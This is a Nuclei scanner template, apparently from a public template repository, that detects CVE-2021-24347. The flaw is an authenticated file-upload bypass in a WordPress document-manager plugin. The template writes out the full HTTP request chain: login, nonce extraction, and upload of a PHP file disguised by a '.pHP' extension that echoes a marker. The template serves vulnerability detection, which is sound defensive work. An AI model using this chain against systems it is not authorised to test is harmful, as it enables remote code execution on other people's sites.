nuclei-templates/http/cves/2021/CVE-2021-24347.yaml

106 lines
3.8 KiB
YAML

id: CVE-2021-24347
info:
name: WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload
author: theamanrawat
severity: high
description: |
WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP.
remediation: Fixed in version 4.22.
reference:
- https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
- https://wordpress.org/plugins/sp-client-document-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24347
- http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-24347
cwe-id: CWE-178
epss-score: 0.96951
epss-percentile: 0.99632
cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: smartypantsplugins
product: sp_project_\&_document_manager
framework: wordpress
tags: sp-client-document-manager,wpscan,cve,wp-plugin,wp,authenticated,wordpress,cve2021,rce,packetstorm,intrusive
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="cdm_upload_file_field"
{{nonce}}
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-name"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
Content-Type: image/svg+xml
<?php
echo "CVE-2021-24347";
?>
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-notes"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="sp-cdm-community-upload"
Upload
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--
- |
GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(header_4, "text/html")
- status_code_4 == 200
- contains(body_4, "CVE-2021-24347")
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"
internal: true
# digest: 4b0a00483046022100aeb42be5cb71ea4248292571c0fa9cebe281d513d74df191dac1195353f6bc31022100b28f529d9258ec7a9fa1cc23bd51b4bc89eff5a885b5c8b79abff98368b209c9:922c64590222798bb761d5b6d8e72950